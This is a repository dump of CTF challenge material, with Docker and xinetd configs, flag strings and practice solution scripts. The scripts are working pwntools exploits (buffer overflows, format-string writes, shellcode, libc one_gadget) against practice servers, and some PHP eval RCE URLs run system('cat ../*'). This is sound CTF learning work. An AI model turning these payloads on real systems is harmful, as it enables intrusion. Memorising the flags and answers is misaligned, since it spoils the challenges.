VMRevenge 10 | port = 10101 11 | flags = REUSE 12 | } 13 | 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | patch -t -p0 2 | 3 | #ifndef GC_ 4 | #define GC_ 5 | 6 | typedef struct garbage{ 7 | void *ptr; 8 | int ref; 9 | struct garbage *next; 10 | }garbage; 11 | 12 | garbage *head; 13 | 14 | void *gcCalloc(int count, int size); 15 | int gcFree(void *ptr); 16 | void *gcStart(); 17 | garbage *getHead(void *ptr); 18 | 19 | #endif -------------------------------------------------------------------------------- /MyChallenges/Pwn/Variable_Machine_Revenge/sourcecode/src/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | OBJS=vm.o gc.o main.o 3 | TARGET=main 4 | CFLAGS=-std=c99 -fPIC 5 | 6 | 7 | all: $(TARGET) 8 | 9 | $(TARGET): $(OBJS) 10 | $(CC) -o $@ $(OBJS) -pie -lpthread -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Wheel of Fortune 3 | 4 | Category : 5 | Pwn, Misc 6 | 7 | Desc : 8 | The wheel of fortune tells your fortune... 9 | 10 | Estimated Difficulty : 11 | 3/10 12 | 13 | Note : 14 | Original version had a BOF in read_num, which is fixed here 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m WOF 7 | RUN chown -R root:root /home/WOF 8 | RUN chmod -R 755 /home/WOF 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | wof: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/WOF:ro 8 | - ./xinetd:/etc/xinetd.d/wof:ro 9 | ports: 10 | - "10102:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{Deny_Thy_Fortune_and_Refuse_Thy_Doom} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/WOF/wheel_of_fortune 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/distribute/share/wheel_of_fortune: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Wheel_of_Fortune/distribute/share/wheel_of_fortune -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service wof 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/WOF/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = WOF 10 | bind = 0.0.0.0 11 | port = 10101 12 | flags = REUSE 13 | } 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Wheel_of_Fortune/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all wheel_of_fortune.c -o wheel_of_fortune 3 | strip wheel_of_fortune 4 | 5 | clean: 6 | rm wheel_of_fortune 7 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Draupnir 3 | 4 | Category : 5 | Smart Contract, Misc (Not Smart Contract) 6 | 7 | Desc : 8 | Ninth the night, ninth the price 9 | 10 | Credits : 11 | infra code is modified from ParadigmCTF repo (https://github.com/paradigm-operations/paradigm-ctf-2021) 12 | 13 | Estimated Difficulty : 14 | 10/10 15 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/Draupnir.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/SmartContract/Draupnir/Draupnir.pdf -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0-or-later 2 | 3 | pragma solidity 0.8.9; 4 | 5 | import "./weth9.sol"; 6 | 7 | contract Setup { 8 | WETH9 public weth; 9 | 10 | constructor() payable { 11 | require(msg.value == 100 ether); 12 | weth = new WETH9(); 13 | weth.deposit{value:msg.value}(); 14 | return; 15 | } 16 | 17 | function isSolved() external view returns (bool) { 18 | return address(weth).balance == 0; 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | draupnir: 5 | build: . 6 | volumes: 7 | - ./share:/home/Draupnir:ro 8 | environment: 9 | - "USERNAME=Draupnir" 10 | - "PORT=10101" 11 | - "HTTP_PORT=10102" 12 | - "ENV=dev" 13 | - "FLAG=BALSN{gan4che_rev3rt_4nd_mu1tiply_1s_s0_sw33t}" 14 | - "PUBLIC_IP=127.0.0.1" 15 | - "RPC_URL=" 16 | ports: 17 | - "10101:10101" 18 | - "10102:10102" 19 | restart: always 20 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/chal.py: -------------------------------------------------------------------------------- 1 | import eth_sandbox 2 | from web3 import Web3 3 | 4 | eth_sandbox.run_launcher([ 5 | eth_sandbox.new_launch_instance_action(deploy_value=Web3.toWei(100, 'ether')), 6 | eth_sandbox.new_get_flag_action() 7 | ]) 8 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | for f in /home/${USERNAME}/startup/*; do 4 | echo "[+] running $f" 5 | bash "$f" 6 | done 7 | 8 | tail -f /var/log/${USERNAME}/* 9 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/eth_sandbox/__init__.py: -------------------------------------------------------------------------------- 1 | from .auth import * 2 | from .launcher import * 3 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/eth_sandbox/auth.py: -------------------------------------------------------------------------------- 1 | from uuid import uuid4 2 | 3 | def load_auth_key(): 4 | with open("/tmp/auth", "r") as f: 5 | return f.read() 6 | 7 | def generate_auth_key(): 8 | auth_key = str(uuid4()) 9 | with open("/tmp/auth", "w") as f: 10 | f.write(auth_key) 11 | return auth_key 12 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/handler.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec python3 /home/${USERNAME}/chal.py 2>&1 4 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/startup/98-start-gunicorn: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | gunicorn \ 4 | --bind 0.0.0.0:$HTTP_PORT \ 5 | --daemon \ 6 | --access-logfile /var/log/${USERNAME}/gunicorn.access.log \ 7 | --error-logfile /var/log/${USERNAME}/gunicorn.error.log \ 8 | eth_sandbox.server:app 9 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/distribute/share/startup/99-start-xinetd: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | xinetd -filelog /var/log/${USERNAME}/xinetd.log 4 | -------------------------------------------------------------------------------- /MyChallenges/SmartContract/Draupnir/solution/exp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | python3 exp.py exp.sol 100 4 | -------------------------------------------------------------------------------- /Practice/CTFS.me/binary_exploitation/namelist.py: -------------------------------------------------------------------------------- 1 | ###Simple buffer overflow of gets()### 2 | 3 | from pwn import * 4 | 5 | r = remote('chall2.ctfs.me',2004) 6 | r.sendlineafter('Name: ',b'\x00'*0x20+p32(1)) 7 | r.interactive() 8 | -------------------------------------------------------------------------------- /Practice/CTFS.me/binary_exploitation/obstacle.py: -------------------------------------------------------------------------------- 1 | ###Write addr and write data by printf() format string attack### 2 | 3 | from pwn import * 4 | 5 | r = remote('chall2.ctfs.me',2005) 6 | 7 | r.sendafter('me:)\n',b'a'*8+p32(0x804a030)+b'%47817c%13$n') 8 | r.interactive() 9 | -------------------------------------------------------------------------------- /Practice/CTFS.me/binary_exploitation/secret.py: -------------------------------------------------------------------------------- 1 | ###Leak data with printf() format string### 2 | 3 | from pwn import * 4 | 5 | r = remote('chall2.ctfs.me',2007) 6 | r.sendlineafter('sesuatu\n','%13$p') 7 | leakdata = r.recv().strip()[2:] 8 | r.sendafter('Rahasia: ',leakdata) 9 | r.interactive() 10 | 11 | -------------------------------------------------------------------------------- /Practice/CTFS.me/binary_exploitation/soeltanbank.py: -------------------------------------------------------------------------------- 1 | ##gets() overflow and change variable value### 2 | 3 | from pwn import * 4 | 5 | r = remote('chall2.ctfs.me',2008) 6 | r.sendlineafter('Nama: ',b'\x00'*0x80+p32(0x5f5e0ff)) 7 | r.interactive() 8 | -------------------------------------------------------------------------------- /Practice/CTFS.me/binary_exploitation/thoughtfuldecision.py: -------------------------------------------------------------------------------- 1 | ###Straightforward buffer overflow on gets### 2 | 3 | from pwn import * 4 | 5 | r = remote('chall2.ctfs.me',2011) 6 | sys = 0x40069a 7 | r.sendlineafter('Just tell your story down here\n',b'a'*0x48+p64(sys)) 8 | r.interactive() 9 | 10 | -------------------------------------------------------------------------------- /Practice/CTFS.me/cryptography/as_beautiful_as_ruby.py: -------------------------------------------------------------------------------- 1 | ###Brute force search small random space### 2 | 3 | crypt = open("rubyflag").read()[1:-2] 4 | length = len(crypt) 5 | crypt = crypt[length//15:2*length//15] 6 | length = len(crypt) 7 | a = int('1'+'0'*(length),2) 8 | for i in range(8): 9 | crypt = crypt[1:]+crypt[0] 10 | flag = [] 11 | for j in range(0,length,8): 12 | flag.append(int(crypt[j:j+8],2)) 13 | print(''.join(list(map(chr,flag)))) 14 | -------------------------------------------------------------------------------- /Practice/CTFS.me/reverse/balikin.py: -------------------------------------------------------------------------------- 1 | ###Simple XOR decode### 2 | 3 | from Crypto.Cipher import XOR 4 | import base64 5 | 6 | key = "RENDANGBASOGULING" 7 | cipher = XOR.new(key) 8 | crypt = 'Dof99eGO8erh6/nvnfPn9eGX6/j84fzv5fLh8u/t5/fzh+P79PTj8vfq/fXa3M0=' 9 | mid = cipher.encrypt(base64.b64decode(crypt)) 10 | fin = '' 11 | kr = 0 12 | for i in mid: 13 | fin+=chr(int(i)-ord(key[kr%len(key)])) 14 | kr+=1 15 | print(fin[::-1]) 16 | -------------------------------------------------------------------------------- /Practice/CTFS.me/reverse/privateroom.py: -------------------------------------------------------------------------------- 1 | ###Simple Calculations### 2 | 3 | from pwn import * 4 | flag = [233, 129, 9, 5, 130, 194, 195, 39, 75, 229] 5 | 6 | inp = '' 7 | for i in flag: 8 | char = bin(i)[2:].rjust(8,'0') 9 | char = ((int(char[3:],2)^15)<<3) + (int(char[:3],2)^3) 10 | print(char) 11 | inp+=chr(char) 12 | print(inp) 13 | -------------------------------------------------------------------------------- /Practice/CTFS.me/reverse/resqua.py: -------------------------------------------------------------------------------- 1 | ###Encodes partial binary with self function### 2 | #####Patch binary with gdb x/gx hex after unlock function 3 | 4 | import math 5 | 6 | for i in range(10000,1110,-1): 7 | if '0' in str(i): 8 | continue 9 | num = math.sqrt(i) 10 | if num//1==num: 11 | print(num**2) 12 | -------------------------------------------------------------------------------- /Practice/CTFS.me/reverse/reverseme1.txt: -------------------------------------------------------------------------------- 1 | ###Trivial### 2 | generate pseducode with IDApro and all is clear 3 | -------------------------------------------------------------------------------- /Practice/CTFS.me/web_exploitation/Baby_RCE_1.txt: -------------------------------------------------------------------------------- 1 | ###Simple RCE with controllable eval() content### 2 | # notice that '!!!' is concatenated at the end of string 3 | # use comment to bypass !!! 4 | 5 | ###Tried commands 6 | http://chall2.ctfs.me:8010/index.php?name=echo(system('ls'));// 7 | http://chall2.ctfs.me:8010/index.php?name=echo(system('ls ../'));// 8 | http://chall2.ctfs.me:8010/index.php?name=echo(system('cat ../*'));// 9 | 10 | 11 | ###shell_exec works as well as system 12 | http://chall2.ctfs.me:8010/index.php?name=echo(shell_exec('cat ../*'));// 13 | -------------------------------------------------------------------------------- /Practice/Eonew.cn/Black_Hole/black_hole: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Black_Hole/black_hole -------------------------------------------------------------------------------- /Practice/Eonew.cn/Blockade/blockade: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Blockade/blockade -------------------------------------------------------------------------------- /Practice/Eonew.cn/Car_Store/car_store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Car_Store/car_store -------------------------------------------------------------------------------- /Practice/Eonew.cn/Easy_ASAN/easy_asan: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Easy_ASAN/easy_asan -------------------------------------------------------------------------------- /Practice/Eonew.cn/Easy_Printf/easy_printf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Easy_Printf/easy_printf -------------------------------------------------------------------------------- /Practice/Eonew.cn/Easy_Stack/easy_stack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Easy_Stack/easy_stack -------------------------------------------------------------------------------- /Practice/Eonew.cn/Easy_Stack/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Addr 4 | # libc2.27 5 | libc_start_offset = 0x21ab0 6 | restart_offset = 0x21b90 7 | one_gadget = 0x10a38c 8 | 9 | ###Exploit 10 | r = remote('nc.eonew.cn',10004) 11 | r.sendline(b'a'*0x88+p8(restart_offset&0xff)) 12 | restart_addr = u64(r.recvline()[0x88:-1]+b'\x00\x00') 13 | libc_base = restart_addr-restart_offset 14 | print(hex(libc_base)) 15 | r.sendline(b'a'*0x88+p64(libc_base+one_gadget)) 16 | r.interactive() 17 | -------------------------------------------------------------------------------- /Practice/Eonew.cn/Fog/fog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Fog/fog -------------------------------------------------------------------------------- /Practice/Eonew.cn/HTTP_Server/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/HTTP_Server/server -------------------------------------------------------------------------------- /Practice/Eonew.cn/House_of_Storm/house_of_storm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/House_of_Storm/house_of_storm -------------------------------------------------------------------------------- /Practice/Eonew.cn/Kernel_Pwn1/test1.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Kernel_Pwn1/test1.ko -------------------------------------------------------------------------------- /Practice/Eonew.cn/Kernel_Pwn2/test2.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Kernel_Pwn2/test2.ko -------------------------------------------------------------------------------- /Practice/Eonew.cn/Link_List/link_list: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Link_List/link_list -------------------------------------------------------------------------------- /Practice/Eonew.cn/Login/login: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Login/login -------------------------------------------------------------------------------- /Practice/Eonew.cn/Mimic_Heap/mimic: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Mimic_Heap/mimic -------------------------------------------------------------------------------- /Practice/Eonew.cn/Mimic_Heap/mimic_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Mimic_Heap/mimic_heap -------------------------------------------------------------------------------- /Practice/Eonew.cn/Mimic_Stack/mimic: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Mimic_Stack/mimic -------------------------------------------------------------------------------- /Practice/Eonew.cn/Mimic_Stack/mimic_stack_x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Mimic_Stack/mimic_stack_x64 -------------------------------------------------------------------------------- /Practice/Eonew.cn/Mimic_Stack/mimic_stack_x86: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Mimic_Stack/mimic_stack_x86 -------------------------------------------------------------------------------- /Practice/Eonew.cn/Mountain/mountain: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Mountain/mountain -------------------------------------------------------------------------------- /Practice/Eonew.cn/No_Leak/no_leak: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/No_Leak/no_leak -------------------------------------------------------------------------------- /Practice/Eonew.cn/Shellcode/shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Shellcode/shellcode -------------------------------------------------------------------------------- /Practice/Eonew.cn/Time_Heap/time_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Time_Heap/time_heap -------------------------------------------------------------------------------- /Practice/Eonew.cn/Truncate_String/truncate_string: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Eonew.cn/Truncate_String/truncate_string -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Addis_Ababa.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Addis_Ababa.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Algiers.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Algiers.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Bangalore.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Bangalore.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Chernobyl.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Chernobyl.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Cusco.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Cusco.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Hanoi.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Hanoi.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Hollywood.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Hollywood.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Jakarta.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Jakarta.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Johannesburg.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Johannesburg.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Lagos.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Lagos.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Montevideo.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Montevideo.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/New_Orleans.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/New_Orleans.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Novosibirsk.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Novosibirsk.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Reykjavik.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Reykjavik.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Santa_Cruz.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Santa_Cruz.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Sydney.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Sydney.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Tutorial.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Tutorial.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Vladivostok.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Vladivostok.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/Challenge_ROMS/Whitehorse.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/Challenge_ROMS/Whitehorse.zip -------------------------------------------------------------------------------- /Practice/MicroCorruption/LockITProManual.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/LockITProManual.pdf -------------------------------------------------------------------------------- /Practice/MicroCorruption/MSP430Reference.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/MicroCorruption/MSP430Reference.pdf -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Grotesque/cmd3: -------------------------------------------------------------------------------- 1 | passwd : FuN_w1th_5h3ll_v4riabl3s_haha 2 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/alloca/alloca: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/alloca/alloca -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/alloca/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Addr 4 | win_func = 0x80485ab 5 | 6 | ###Exploit 7 | s = ssh(host='pwnable.kr',port=2222, 8 | user='alloca', 9 | password='guest') 10 | r = s.process('./alloca',env={p32(win_func)*1000:p32(win_func)*1000}) 11 | 12 | r.sendlineafter('you\n\n','-82') 13 | r.sendline(str(0xff80000)) 14 | r.interactive() 15 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/ascii_easy/ascii_easy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/ascii_easy/ascii_easy -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/brain_fuck/bf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/brain_fuck/bf -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/dragon/dragon: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/dragon/dragon -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/echo1/echo1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/echo1/echo1 -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/echo1/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch='amd64' 4 | 5 | ###Util 6 | def echo1(data): 7 | r.sendlineafter('> ','1') 8 | r.sendline(data) 9 | 10 | ###Addr 11 | buf = 0x6020a0 12 | 13 | ###Exploit 14 | r = remote('pwnable.kr',9010) 15 | 16 | relay = asm('''jmp rsp''') 17 | r.sendlineafter(' : ',relay) 18 | 19 | padding = b'a'*0x28 20 | fake_rip = p64(buf) 21 | shellcode = asm(shellcraft.sh()) 22 | payload = padding+fake_rip+shellcode 23 | echo1(payload) 24 | 25 | r.interactive() 26 | 27 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/echo2/echo2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/echo2/echo2 -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/fix/fix: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/fix/fix -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/fsb/fsb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/fsb/fsb -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/loveletter/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Exploit 4 | s = ssh(host='pwnable.kr',port=2222, 5 | user='loveletter', 6 | password='guest') 7 | r = s.remote('127.0.0.1',9034) 8 | 9 | r.send((b'val cat flag '.ljust(0xfd,b'a')+b';\x01').ljust(0xff,b'\x00')) 10 | r.interactive() 11 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/loveletter/loveletter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/loveletter/loveletter -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/md5_calculator/genrand.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(){ 6 | srand(time(NULL)); 7 | for(int i = 0;i<8;i++) 8 | printf("%d\n",rand()); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/md5_calculator/md5_calculator: -------------------------------------------------------------------------------- 